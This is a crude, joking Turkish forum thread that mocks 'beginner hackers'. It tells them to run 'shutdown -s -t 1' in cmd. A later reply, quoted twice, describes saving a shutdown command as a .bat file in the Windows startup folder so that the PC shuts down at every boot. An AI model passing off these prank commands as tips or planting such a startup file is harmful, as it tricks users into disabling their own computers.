Yeni Baslayan Heykır Arkadaşlar Bunu Denesin Kullanışlı (1 Viewer)

Emilyano Zapota 

Since 2011 Yanıma Aldım Kendimi 🇹🇷
Credits
15,432
Rating - 0%
evet yeni baslayan heykır kardeşlerim baslata girin cmd yazın konsol ekranına shutdown -s -t 1 bunu yapıstırın enter tusuna basın pc size göz kırpıcak kırpmazsa siz ona göz kırpın :D

sky

BABA
Credits
0
Rating - 0%
olum ekranda ağız çıktı kalk siktir git bi deve sikini doğrultamıyon dedi. sakın denemeyin arkadaşlar çok tehlikeli baksanıza bana ne oldu

5

53arda63

cmd yi açıp help yazıp tüm kodları sıralayıp kod seçip kayan yazı ile hemçkır lık yapmak çee çee çee

Z

z3r0fy-old-hesabi

shutdown -s -t 10 Bunu TXT Belgesine yaz sorna "farkli kaydet" kismindan uzantisini .bat yap "Baslat>Calistir>shell:startup" bu dosyayi ac olusturdugun bat dosyasini bunun icine at bakalim o zaman pc sana goz kirpar iste :D ama tek sorun birdaha gozlerini acmaz..

5

53arda63

shutdown -s -t 10 Bunu TXT Belgesine yaz sorna "farkli kaydet" kismindan uzantisini .bat yap "Baslat>Calistir>shell:startup" bu dosyayi ac olusturdugun bat dosyasini bunun icine at bakalim o zaman pc sana goz kirpar iste :D ama tek sorun birdaha gozlerini acmaz..
Benim boyle bir konum var çee

E

emarex35

cmd ye shift yazıp 5555 e gönderin beyaz sarayın sunucu veritabanı cebinize gelsin.çeeçeeçeesize kıyağımdır ha.;)

E

emarex35

cmd nin hikayesi bende apayrıdır.çocukken çıraklık yaptığım bi fabrikanın bilgisayarında oyun oynuyordum.cmd yi kısayol olarak masaüstüne kopyalamışlar.açtım cmd yi rasgele yazıp çizip enterlarken fabrikanın bütün elektriğini kestim.hackerlık merakım burdan gelmektedir.o anı yaşamadan bilemezsiniz.ama aklım gitti valla sıçtım.hemen cmd yi kapatıp oyun açtım çaktırmadım.kendime sövmekteyim ne yazdığımı bi kenara not etmedim diye.gerçi korkudan bırak kodu adımı unuttum o an:):)

E

emarex35

fabrikada jeneratör var kardeş uyandırim.hem sen hikayenin altında ne aradın onu anlamadım.öküz altında buza arıyan tiplerdensin.

Users who are viewing this thread